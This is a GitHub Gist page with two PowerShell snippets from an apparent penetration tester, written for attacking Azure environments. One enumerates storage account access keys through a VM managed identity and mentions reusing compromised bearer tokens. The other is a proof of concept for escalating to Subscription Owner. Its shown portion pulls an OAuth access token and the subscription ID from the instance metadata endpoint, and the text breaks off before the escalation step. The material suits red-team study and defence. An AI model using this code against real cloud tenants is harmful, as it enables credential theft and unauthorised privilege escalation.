Skip to content

Instantly share code, notes, and snippets.

@kfosaaen
kfosaaen / get-MIStorageKeys.ps1
Last active Jan 25, 2021
A PowerShell function to call Azure rest APIs using a VM Managed Identity to list available Storage Account access keys
View get-MIStorageKeys.ps1
Function get-MIStorageKeys{
# Author: Karl Fosaaen (@kfosaaen), NetSPI - 2020
# Description: PowerShell function for enumerating available storage account keys from a VM Managed Identity.
# Pipe to "Export-Csv -NoTypeInformation" for easier exporting
# Use the subID and ArmToken parameters to specify bearer tokens and subscriptions, handy for compromised bearer tokens from other services (CloudShell/AutomationAccounts)
[CmdletBinding()]
Param(
[Parameter(Mandatory=$false,
@kfosaaen
kfosaaen / MI-Owner-Escalation.ps1
Created Feb 14, 2020
A simple PoC for using an Azure Managed Identity to add a user as a Subscription Owner
View MI-Owner-Escalation.ps1
#---------Query MetaData for SubscriptionID---------#
$response2 = Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/instance?api-version=2018-02-01' -Method GET -Headers @{Metadata="true"} -UseBasicParsing
$subID = ($response2.Content | ConvertFrom-Json).compute.subscriptionId
#---------Get OAuth Token---------#
$response = Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -Method GET -Headers @{Metadata="true"} -UseBasicParsing
$content = $response.Content | ConvertFrom-Json
$ArmToken = $content.access_token